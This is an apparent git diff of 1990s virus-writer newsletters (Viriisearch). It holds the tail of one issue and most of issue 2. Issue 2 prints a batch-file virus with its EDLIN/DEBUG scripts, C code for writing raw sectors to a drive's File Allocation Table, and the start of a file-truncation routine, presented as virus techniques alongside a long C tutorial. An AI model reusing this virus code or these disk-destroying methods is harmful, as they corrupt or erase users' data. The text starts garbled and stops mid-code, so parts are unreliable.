Mied + +Viriisearch Neletter, Inc. + + + +Weird eh? And that's not all, I went to scan memory, and the little window + +came up that it displays the name of the current virus being scanned for, but + +that's it, no names were displayed. The program appeared to freeze up, and + +the disk kept spinning with the drive light on. I re-booted once again and + +ran NAV again. The weird letters were still there but it scanned memory no + +problem this time. I exited it from NAV and went to drive B to delete files + +when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when + +does DOS allow spaces in filenames? As a result I couldn't view it or delete + +it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At + +one point a message also came up on the screen: "File Allocation Table Bad, + +Drive B". I imagine Jerusalem-4 was responsible for the weird file name and + +the bad FAT on drive B. I have no idea why NAV was acting funny, possibly + +a genuine disk error and not due to a virus, since the disk was always write + +protected. + + + +----------------------------------------------------------------------------- + + + +Well, that's it for "Suicidal Tendencies" for this month! + + + +I don't recommend trying this on any computer with a hard drive. I do not have + +a hard drive on the machine I do my experimenting on, so if I am careful and + +keep the virus isolated to one disk, I have nothing to worry about. + + + +----------------------------------------------------------------------------- + + + +Anti Viral Software: + + + +----------------------------------------------------------------------------- + + + +Here are some nice virus scanners/anti viral programs to check out: + + + +----------------------------------------------------------------------------- + + + +Scan v89b (C) McAfee - available on most Public Domain BBSes + + + +Clean v89b (C) McAfee - available on most Public Domain BBSes + + + +Norton Anti Virus v2.0 (C) Symantec + + + +Central Point Anti Virus (C) Central Point Software + + + +There are a few others, but I think the above four are the best. I use + +Norton Anti Virus and Scan. + + + +----------------------------------------------------------------------------- + + + +Some things you should know: + + + +----------------------------------------------------------------------------- + + + +Most people assume that a hard drive in a newly purchased computer, or a new + +program still in the shrinkwrap are always virus free. Well, this is just not + +true. The reported cases are few and far in between, but today anything can + +happen, and it has. A certain computer company shipped out 500 of their + +computers infected with the Michaelangelo virus, which started the whole + +panic in the first place. And there have been a few times where someone bought + +a brand new program, took it home and started using it, not expecting it to + +be infected with a virus. Well, it was. After all, people create virii and + +people work at computer companies, and software distributors. So what's + +stopping a pissed off employee from infecting a computer or a program? Nothing + +at all. + + + +How you take this information is entirely up to you. + + + +If you call a BBS and they say they scan for virii, don't assume that every + +single file will be virus free, some can sneak through. There is also the + +possibility of a unknown virus that was not detected by the scanner. + + + +Last but not least: ALWAYS BACK UP YOUR DATA!!! + + + +Philosophy Dept: + + + +"Knowledge is power" - Francis Bacon, 16th Century Philosopher + + + +"Even if a computer is locked, sealed in concrete, placed in a lead room and + +surrounded by armed guards, I'd still have my doubts." + + + +Those aren't the exact words and I forget who said that, but it is quite + +appropriate and all too true. + + + +I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated + +entirely to computer virii. + + + + + +Until Next Time......Be Careful!!! + + + + * Criminal Minded * + +----------------------------------------------------------------------------- + + + +Downloaded From P-80 International Information Systems 304-744-2253 + diff --git a/textfiles.com/virus/cmvs-2.v1 b/textfiles.com/virus/cmvs-2.v1 new file mode 100644 index 00000000..a94157d2 --- /dev/null +++ b/textfiles.com/virus/cmvs-2.v1 @@ -0,0 +1,3582 @@ +DISCLAIMER: + +The author will NOT accept responsibility for any damage to your + +computer media and/or files, or responsibility for any action you might + +take that will result in legal proceedings, the source code, if any, in + +this newsletter is THE REAL THING, and you, after you read this, will be + +well aware of what virii are capable of, and knowing that, it is expected + +that you will act responsibly. + + + +DISCLAIMER II: + +All I know about programming I have learned on my own, and did not go to + +school for, and am still learning. As a result, I am sometimes prone to + +make mistakes, and be wrong about things, so please be patient if I should + +make a mistake, or say something that isn't true, which would be totally + +unintentional. + + + + + + Viriisearch + + ----------- + + + + The Virus Research Newsletter + + + + Volume 1, Number 2 + + + + 7/2/92 + + + +CREDITS: + +----------------------------------------------------------------------------- + +Author...................................................Criminal Minded + +Editor...................................................Criminal Minded + +Ideas, Source, Examples Supplied By......................Criminal Minded + +Facts Stolen From Several Sources By.....................Criminal Minded + +----------------------------------------------------------------------------- + + + +Introduction: + + + +Welcome To The Second Issue Of Viriisearch, The Virus Research Newsletter. + + + +In this issue: + + + +Batch File Virii: How Effective Are They? + + + +Methods Used To Do The Following: + + + +1. Removing/Altering Attributes On Files + +2. Writing To The File Allocation Table + +3. Truncating Files To 0 Bytes (They cannot be recovered with this method, + + but it is rather slow) + +4. Saving/Restoring File Dates/Times + +5. Formatting + + + +Fun With COMMAND.COM + +Sample Source Code Of Virii + +"Suicidal Tendencies" Department/Virus Of The Month + +Final Notes + + + +----------------------------------------------------------------------------- + + + +Batch File Virii: How Effective Are They? + + + +----------------------------------------------------------------------------- + + + +This Is A Batch File Virus: + + + +----------------------------------------------------------------------------- + +echo = off + +ctty nul + +path c:\msdos + +dir *.com/w>ind + + + +edlin ind<1 + +debug ind<2 + +edlin name.bat<3 + +ctty con + +name + + + +----------------------------------------------------------------------------- + + + +This is what each line in the batch file does: + + + +Line: What It Does: + +----------------------------------------------------------------------------- + +echo = off Turns Echo Off + +ctty nul Turns Console Output Off + +path c:\msdos Sets up the path in the environment as C:\MSDOS + +dir *.com/w>ind Redirects the output of the command "DIR *.COM/W to a + + File Called "IND" + + + +edlin ind>1 Edits "IND" File Using The Edlin Commands In "1" + +edlin ind>2 Edits "IND" File Using The Edlin Commands In "2" + +edlin name.bat>3 Edits "NAME.BAT" Using The Edlin Commands In "3" + +ctty con Restores Output To The Console + +name Runs NAME.BAT + + + +----------------------------------------------------------------------------- + + + +Contents Of The File "1" + + + +----------------------------------------------------------------------------- + + + +1,4d ( Here line 1-4 of the "IND" file are deleted ) + +e ( Save file ) + + + +----------------------------------------------------------------------------- + + + +Contents Of The File "2" + + + +----------------------------------------------------------------------------- + + + +m100,10b,f000 (First program name is moved to the F000H address to save) + + + +e108 ".BAT" (Extention of file name is changed to .BAT) + +m100,10b,f010 (File is saved again) + +e100"DEL " (DEL command is written to address 100H) + +mf000,f00b,104 (Original file is written after this command) + +e10c 2e (Period is placed in from of extension) + +e110 0d,0a (Carrige return+ line feed) + +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) + +e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) + +e12b od,0a (COPY command terminated with carriage return + lf) + +rxc ( The CX register is ... ) + +2c ( set to 2CH) + +nname.bat ( Name it NAME.BAT) + +w ( Write ) + +q ( quit ) + + + +----------------------------------------------------------------------------- + + + +Contents Of The File "3" + + + +----------------------------------------------------------------------------- + + + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + + 1 , 1 ? . . n y y y y y y y + +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + + y . 2 , ? ? r . . n n y y y + +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + + y y y y . E . . . . . . . . . + + + +----------------------------------------------------------------------------- + + + +Ok, according to the author, this batch file makes use of EDLIN and DEBUG + +and only affects .COM files. + + + +I ran it twice, first on one of my DOS bootable disks. This is the directory + +listing of that disk before I ran this supposed "batch file virus" + + + + Volume in drive A has no label + + Volume Serial Number is 004A-1EC0 + + Directory of A:\ + + + +COMMAND COM 47845 04-09-91 5:00a + +ANSI SYS 9029 04-09-91 5:00a + +RAMDRIVE SYS 5873 04-09-91 5:00a + +CONFIG SYS 39 01-01-80 12:04a + +SYS COM 13440 04-09-91 5:00a + +NDOS COM 2419 08-14-84 12:00p + +UNDELETE EXE 13924 04-09-91 5:00a + +MEM EXE 39818 04-09-91 5:00a + +SFORMAT EXE 64921 08-05-91 6:01a + +DEBUG EXE 21692 06-07-90 2:24a + +EDLIN EXE 14121 06-07-90 2:24a + +ATTRB EXE 6232 01-01-80 12:21a + +AUTOEXEC BAT 69 01-01-80 12:02a + +NORTON INI 530 01-01-80 12:01a + +VR BAT 112 01-01-80 7:00p + +1 10 01-01-80 7:01p + +2 171 01-01-80 7:04p + +3 269 01-01-80 7:08p + + 18 file(s) 240514 bytes + + 353280 bytes free + + + +----------------------------------------------------------------------------- + + + +Ok, I ran VR.BAT and it accessed the disk for about 30 seconds and then the + +computer froze up. So I rebooted and looked at the disk. There was no file + +damage, but there were four new files on the disk: + + + +IND 120 bytes + +IND.BAK 209 bytes + +NAME.BAT 120 bytes + +NAME.$$$ 0 bytes + + + +----------------------------------------------------------------------------- + + + +This is the contents of "IND" + + + + + +COMMAND.COM SYS.COM NDOS.COM + + 3 file(s) 63704 bytes + + 286720 bytes free + + + +----------------------------------------------------------------------------- + + + +This Is The Contents Of "IND.BAK" + + + +----------------------------------------------------------------------------- + + + + Volume in drive A has no label + + Volume Serial Number is 004A-1EC0 + + Directory of A:\ + + + +COMMAND.COM SYS.COM NDOS.COM + + 3 file(s) 63704 bytes + + 286720 bytes free + + + +----------------------------------------------------------------------------- + + + +And This Is The Contents Of "NAME.BAT" + + + +----------------------------------------------------------------------------- + +del MMAN.bat. S + +copy \vr.batO + +COMMAN.bat + + 3 file(s) 63704 bytes + + 286720 bytes free + + + +----------------------------------------------------------------------------- + + + +I Then Proceeded To Run NAME.BAT and all that did was give me a "File Not + +Found" And A Few "Bad Command Or Filename"'s + + + +I Am Not Too Sure Of What This Individual Was Attempting To Do, But I Would + +Not Be Too Worried About Him Being Capable Of Doing Anything Malicious To + +Your System As His Batch File Virus Is A Piece Of Shit. + + + +Also, I Created A Directory Called MSDOS On The Disk, Copied COMMAND.COM, + +SYS.COM, And NDOS.COM To That Directory And Ran VR.BAT again. It Did The Same + +Thing As Before, And Did Not Do Any Damage To The Files In The Root Directory + +Or A:\MSDOS + + + +----------------------------------------------------------------------------- + + + +Methods Used To Do The Following: + + + +1. Removing/Altering Attributes On Files + +2. Writing To The File Allocation Table + +3. Truncating Files To 0 Bytes + +4. Saving/Restoring File Dates/Times + +5. Formatting + + + +----------------------------------------------------------------------------- + + + +Removing/Altering Attributes On Files: + + + +----------------------------------------------------------------------------- + + + +Here Is A Simple C Language Source To Change The Attributes To Normal On A + +File Called "TEST.DAT" + + + +----------------------------------------------------------------------------- + + + +#include + + + +int main (void); + + + +main() + +{ + + _dos_setfileattr("TEST.DAT", _A_NORMAL); + +} + + + +----------------------------------------------------------------------------- + + + +I Think It's Pretty Much Self-Explanatory. Is Just The Header File + +That Has The Prototype For "_dos_setfileattr" In It And The Definition For + +The Manifest Constant "_A_NORMAL" + + + +int main (void); + + + +Is The Function Prototype For "main()" Declaring It To Return Type "int" And + +Is Passed No Parameters (void). This Is Keeping Up With The ANSI Standard. + + + +Then _dos_setfileattr("TEST.DAT",_A_NORMAL); + + + +which does the actual attribute change. + + + +----------------------------------------------------------------------------- + + + +Now, A Complete Utility To Change Attributes That I Wrote On 09/16/91. This + +Is The Third Revision Of It, Version 3.0. I Am Proud Of This Particular + +Version, As The Source Code Is 92 Lines, and 3238 Bytes. The Executable Is + +9165 Bytes, Which Is Relatively Small. That Just Shows That This Is A Well + +Written Utility, Especially Compared To Version 1.0, Which Was 1/3 Of The + +Lines, And The Executable Was Around 20K. + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +int count1=0,loop=0; + + + +main(argc,argv) + +int argc; + +char *argv[]; + +{ + +if (argc != 2) { + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + } + +else { + +struct find_t all_file; + + while (loop!=4) { + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + else { + + printf("1. Normal\n"); + + printf("2. Read Only\n"); + + printf("3. Hidden\n"); + + printf("4. System\n"); + + printf("5. Hidden/System/Read Only\n\n"); + + printf("Enter Your Choice: "); + +switch(getch()) { + + case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '2': loop=4; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("\n\nFile: %s successfully changed to: READ ONLY.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("File: %s successfully changed to: READ ONLY.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '3': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + count1++; + + printf("\n\nFile: %s successfully changed to: HIDDEN.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + printf("File: %s successfully changed to: HIDDEN.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '4': loop=4; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + count1++; + + printf("\n\nFile: %s successfully changed to: SYSTEM.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + printf("File: %s successfully changed to: SYSTEM.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + case '5': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + count1++; + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + default: loop=5; + + printf("\n\nThat was not a valid menu selection.\n\n"); + + printf("Please try again:\n\n"); + + break; + + } + + } + + } + + } + +} + + + +----------------------------------------------------------------------------- + + + +"Dissection" Of The Source Code To Attrb v3.0 + + + +----------------------------------------------------------------------------- + + + +int count1=0,loop=0; + + + +This Is Just Global Declaration And Inititialization Of Two Integers, Called + +"count1" and "loop" + + + +You Should Always Initialize Your Integers To Zero, Because "C" Can Sometimes + +Assign The Value To The Integer That Is In The Area Of Memory The Compiler + +Sets Aside For The Integer, Which Could Result In Your Program Not Working + +The Way You Wanted It To. + + + +"count1" keeps track of the number of files whose attributes were changed + +through the use of the "increment operator" ( ++ ) which adds the value of 1 + +to the integer everytime it changes the attribute on a file. + + + +count1++; /* adds the value of 1 to "count1" */ + + + +When there are no more files left to change, it prints the total number of + +files whose attributes were altered with this line: + + + +printf("\n%d Files.\n", count1); + + + +%d is a format specifier, telling the printf function we are printing a int. + +The value to print comes from "count1" at the end, printf looks in there and + +obtains the value, then prints it. + + + +----------------------------------------------------------------------------- + + + +main(argc,argv) + +int argc; + +char *argv[]; + + + +----------------------------------------------------------------------------- + + + +This is how command line parameters are incorporated into programs. argc, a + +integer, keeps track of the number of actual parameters passed. char *argv[] + +is the actual parameter. ATTRB v3.0 takes one command line parameter, a file + +specification. + + + +C>ATTRB30 TEST.DAT + + + +With this, argc would = 2, and argv would be as follows: + + + +argv[0] = "C" + +argv[1] = "TEST.DAT" + + + +argv[0] always has "C" in it. + + + + + +Now, how do you make sure the person using the utility entered the command + +line parameter? Like this: + + + +if (argc != 2) { + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + } + + + +argc should equal 2, so the line: if (argc!=2) + + + +is saying: if argc doesn't equal 2 (! means NOT and = means equal) + + + +If argc doesn't equal 2, that means no command line parameter was passed to + +the program, so it carries out the four lines in between the { and the } + +see below: + + + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + + +it tells you the "usage" of the program: + + + +Usage: C>ATTRB + + + +telling you it needs one command line parameter, a filespec + + + +then it prints the name of the program, author, and date, and exits with a + +error code of 1. + + + +If argc DOES equal 2, it goes to this part of the program: + + + +Without Comments: + + + +else { + +struct find_t all_file; + + while (loop!=4) { + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + + +With Comments: + + + +else { /* else do this if the parameter is supplied */ + + + +struct find_t all_file; /* this tells the program we are going to use the */ + + /* structure defined in DOS.H called "find_t" */ + + /* see below for a description of "find_t" */ + + + + while (loop!=4) { /* will keep going until loop doesn't equal 4 */ + + + + /* this next line searches for the filename you specified, using the */ + + /* "bitwise OR" operator, | to OR the attribute manifest constants */ + + /* together, so it will find any file matching the one you specified */ + + /* regardless of the attribute it has. If _dos_findfirst NOT equals */ + + /* 0, that means the file you specified doesn't exist, so it tells */ + + /* you and exits with a error code of 1 */ + + /* Also in this line is where we pass argv[1] over to the "all_file" */ + + /* structure, which is the same as the "find_t" structure. We just */ + + /* basically changed the name with the line: struct find_t all_file */ + + + + + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file) !=0)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + + +----------------------------------------------------------------------------- + + + +OK, let me interrupt here for a brief discussion of the "find_t" structure + +declared and defined in "DOS.H" + + + +----------------------------------------------------------------------------- + + + +The "find_t" structure: + + + + + +struct find_t { + + char reserved[21]; + + char attrib; + + unsigned wr_time; + + unsigned wr_date; + + long size; + + char name[13]; + + }; + + + + + +Ok, a structure is just a simple way of organizing data and you won't have to + +declare the data types every time, you could just use the structure. + + + +The members of this structure are: + + + +char reserved[21]; /* character array, can hold 21 chars. Reserved by DOS */ + +char attrib; /* holds the attribute */ + +unsigned wr_time; /* holds the time of the file */ + +unsigned wr_date; /* holds the date of the file */ + +long size; /* holds the file size */ + +char name[13]; /* holds the filename */ + + + +at the end of the structure is: }; + + + +this signifies the end of it the structure, but because there is no name + +there, we can rename the structure to anything we line, like we did with the + +line: + + + +struct find_t all_file + + + +now had the structure had a name there, such as: + + + +struct find_t { + + char reserved[21]; + + char attrib; + + unsigned wr_time; + + unsigned wr_date; + + long size; + + char name[13]; + + } fileinfo; + + + +we couldn't rename the structure. The members of the structure would be + +referred to as: + + + +fileinfo.attrib + +fileinfo.wr_time + +fileinfo.wr_date + +fileinfo.size + +fileinfo.name + + + +but since we renamed the structure to "all_file" + + + +the members are called: + + + +all_file.attrib + +all_file.wr_time + + + +etc and so on... + + + +Get it? Good. Now back to ATTRB v3.0 + + + +----------------------------------------------------------------------------- + + + +We left off here: + + + +else { + +struct find_t all_file; + + while (loop!=4) { + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } + + + +As I said, in the 4th line in the above example, argv[1] is passed over to + +the "all_file" structure, so argv[1] from now on will be referred to as: + + + +all_file.name + + + +If the above part of the program does find a matching file, it will go onto + +this part of the program: + + + +Once again, note the "if else" + + + +In English: + + + +if findfile function doesn't find a matching file, print message and exit. + +else do this: + + + + else { + + printf("1. Normal\n"); + + printf("2. Read Only\n"); + + printf("3. Hidden\n"); + + printf("4. System\n"); + + printf("5. Hidden/System/Read Only\n\n"); + + printf("Enter Your Choice: "); + + + +easy eh? + + + +you will notice the { and the } throughout the program, those are VERY, VERY + +important in how your program works. I will cover those after I am done with + +explaining how the program works. + + + +Anyway, the above part of the source just displays the simple menu, showing + +your choices. If you select 1, it will change the attributes of the matching + +files to the normal attribute, 2 will make them read only, etc.... + + + +This is how it gets the input from the user: + + + +switch(getch()) { + + + +getch() is a function which means "get character" + + + +the "switch" allows the use of "case statements" + + + +----------------------------------------------------------------------------- + + + +case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + + +----------------------------------------------------------------------------- + + + +11 lines: + + + +Line 1. Will carry out all the functions after case '1': IF the 1 key is + + pressed. Also on the first line: loop=4; + + This gives the value of 4 to the integer "loop" + + + + Earlier in the code, there was: while (loop!=4) + + Which will keep going until the integer holds a value other than 4 + + Since we assign 4 to it at every case statement, it keeps going. + + The purpose of this is if you hit a wrong key, such as 8, which + + isn't available on the menu, it will go to default, where it assigns + + 5 to loop causing it to display this message: + + + + That was not a valid menu selection. + + + + Please try again: + + + + and then "break" out of the loop and go back to the menu, and + + re-display it. + + + +This is how it does it: + + + + default: loop=5; + + printf("\n\nThat was not a valid menu selection.\n\n"); + + printf("Please try again:\n\n"); + + break; + + + +----------------------------------------------------------------------------- + + + +Now back to "case '1'" + + + +----------------------------------------------------------------------------- + + + +case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + + +----------------------------------------------------------------------------- + + + +Ok, this picks up where + + + +if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { + + + +left off. + + + +_dos_findfirst finds the FIRST matching file and then displays the menu. If + +you select one, it will go to the case '1': statement and change the attribute + +of all_file.name to NORMAL using this line: + + + +_dos_setfileattr(all_file.name, _A_NORMAL); + + + +Then it prints a line telling you the result. %s is another format specifier + +used by printf, like %d mentioned earlier, but %s is to print a string, and + +all_file.name (at the end) contains the string to be printed. + + + +printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + + +Then it adds the value of 1 to count1 to keep track of the total number of + +files attributes were changed on. + + + +count1++; + + + +Once it does all that, it goes onto this part of the code: + + + + while (_dos_findnext(&all_file) == 0) { + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } + + printf("\n%d Files.\n", count1); + + break; + + + +This is a while loop, until _dos_findnext DOESN'T equal 0, it will keep going + +because as long as it does equal 0, that means there are matching files. The + +next 3 lines have already been explained. Once there are no more files, it + +goes to: + + + + printf("\n%d Files.\n", count1); + + break; + + + +Which prints how many files were changed, breaks out of the loop and exits + +the program. + + + +The only difference between case 1, case 2, case 3, case 4, and case 5, is + +the attribute that the file is changed to. + + + +Case 1: Normal (Can Be Deleted, Written To) + +Case 2: Read Only (Cannot Be Written To Or Deleted) + +Case 3: Hidden (Filename Is Not Seen When You Type DIR, But Still Can Be + + Executed If A .COM, .EXE, or .BAT File, Can Still Be Read If A + + Text File, Etc But Cannot Be Deleted, DOS Replies: File Not Found) + +Case 4: System (Like The File Doesn't Exist. Cannot Be Deleted, Executed Or + + Read) + +Case 5: Hidden/System/Read Only (Combination Of 3, 4 and 5) + + + +----------------------------------------------------------------------------- + + + +A VERY important part of C language are the curly brackets, { and } + + + +We will now go through the code one more time telling what each { and } is + +for. + + + +I will put a number next to each one, like so: [1] and [2] and [3] etc.. + + + +at the end of the code, I will tell what each one is for. + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +int count1=0,loop=0; + + + +main(argc,argv) + +int argc; + +char *argv[]; + +{ [1] + +if (argc != 2) { [2] + + printf("Usage: C>ATTRB \n\n"); + + printf("File Attributes Changer v3.0 Written By Criminal Minded.\n"); + + printf("09/16/91.\n"); + + exit(1); + + } [3] + +else { [4] + +struct find_t all_file; + + while (loop!=4) { [5] + + if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { [6] + + printf("\nFile(s) do not exist.\n"); + + exit(1); + + } [7] + + else { [8] + + printf("1. Normal\n"); + + printf("2. Read Only\n"); + + printf("3. Hidden\n"); + + printf("4. System\n"); + + printf("5. Hidden/System/Read Only\n\n"); + + printf("Enter Your Choice: "); + +switch(getch()) { [9] + + case '1': loop=4; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { [10] + + count1++; + + _dos_setfileattr(all_file.name, _A_NORMAL); + + printf("File: %s successfully changed to: NORMAL.\n", all_file.name); + + } [11] + + printf("\n%d Files.\n", count1); + + break; + + case '2': loop=4; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("\n\nFile: %s successfully changed to: READ ONLY.\n", all_file.name); + + count1++; + + while (_dos_findnext(&all_file) == 0) { [12] + + count1++; + + _dos_setfileattr(all_file.name, _A_RDONLY); + + printf("File: %s successfully changed to: READ ONLY.\n", all_file.name); + + } [13] + + printf("\n%d Files.\n", count1); + + break; + + case '3': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + count1++; + + printf("\n\nFile: %s successfully changed to: HIDDEN.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { [14] + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN); + + printf("File: %s successfully changed to: HIDDEN.\n", all_file.name); + + } [15] + + printf("\n%d Files.\n", count1); + + break; + + case '4': loop=4; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + count1++; + + printf("\n\nFile: %s successfully changed to: SYSTEM.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { [16] + + count1++; + + _dos_setfileattr(all_file.name, _A_SYSTEM); + + printf("File: %s successfully changed to: SYSTEM.\n", all_file.name); + + } [17] + + printf("\n%d Files.\n", count1); + + break; + + case '5': loop=4; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + count1++; + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + while (_dos_findnext(&all_file) == 0) { [18] + + count1++; + + _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY); + + printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name); + + } [19] + + printf("\n%d Files.\n", count1); + + break; + + default: loop=5; + + printf("\n\nThat was not a valid menu selection.\n\n"); + + printf("Please try again:\n\n"); + + break; + + } [20] + + } [21] + + } [22] + + } [23] + +} [24] + + + +----------------------------------------------------------------------------- + + + +For every { there has to be a } + + + +Groups of code, such as particular functions, while loops, switch statements, + +and the main body of the program are enclosed in between { and } + + + +----------------------------------------------------------------------------- + + + +Pairs: What The Are For: + +----------------------------------------------------------------------------- + +[1] [24] Enclose The Main Body Of The Program + + + +[2] [3] Enclose The Body Of Code To Execute If argc Doesn't Equal 2 + + + +[4] [21] Enclose The Body Of Code To Execute If argc Does Equal 2 + + + +[5] [22] Enclose The Body Of Code To Execute Until loop Doesn't Equal 4 + + + +[6] [7] Enclose The Body Of Code To Execute If _dos_findfirst Doesn't + + Find A Matching File + + + +[8] [23] Enclose The Body Of Code To Execute If _dos_findfirst Does + + Find A Matching File + + + +[9] [20] For The Switch Statement Beginning And Ending + + + +[10] [11] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '1') + + + +[12] [13] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '2') + + + +[14] [15] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '3') + + + +[16] [17] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '4') + + + +[18] [19] Enclose The Body Of Code To Execute While _dos_findnext is + + Still Finding Matching Files (case '5') + + + +----------------------------------------------------------------------------- + + + +By Now I Am Sure You Can See The Importance Of Curly Brackets And Where You + +Place Them In Your Code. I Recall Someone Thinking They Were A Awesome + +Programmer Because They Knew A Few Nice Third Party Commercial C Libraries, + +But The Didn't Know The Language Too Well, And As A Result, He Was Not The + +Great Programmer He Thought He Was. + + + +----------------------------------------------------------------------------- + + + +Writing/Reading The File Allocation Table: + + + +----------------------------------------------------------------------------- + + + +#include + +int main (void); + +main() + +{ + + struct diskinfo_t disk_info; + + + + disk_info.drive=2; /* 0 = Drive A, 1 = Drive B, 2 = Drive C */ + + disk_info.head=0; /* disk drive head */ + + disk_info.track=0; /* track to read from */ + + disk_info.sector=1; /* Starting Sector */ + + disk_info.nsectors=10; /* Number Of Sectors To Read */ + + + + _bios_disk(_DISK_READ,&disk_info); + +} + + + +----------------------------------------------------------------------------- + + + +The Above Code Will Read 10 Sectors Starting At Sector 1 On Track 0, Side 0 + +Of Drive C. + + + +The _bios_disk function makes use of the "diskinfo_t" structure in "BIOS.H" + + + +The diskinfo_t structure: + + + + struct diskinfo_t { + + unsigned drive; + + unsigned head; + + unsigned track; + + unsigned sector; + + unsigned nsectors; + + void far *buffer; + + }; + + + +----------------------------------------------------------------------------- + + + +If you wanted to write to the disk rather than read from it, replace this + +line: + + + +_bios_disk(_DISK_READ,&disk_info); + + + +With this: + + + +_bios_disk(_DISK_WRITE,&disk_info); + + + +_DISK_READ and _DISK_WRITE are known as 'Manifest Constants' They tell the + +_bios_disk function whether to read or write... + + + +Starting sector and number of sectors will vary depending on the media you + +want to read from or write to the file allocation table (FAT) on. + + + +----------------------------------------------------------------------------- + + + +Truncating Files To 0 Bytes: + + + +----------------------------------------------------------------------------- + + + +#include + +#include + +#include + +#include + +#include + +int main (void); + +main() + +{ + + int fh; + + struct find_t find_all; + + + + 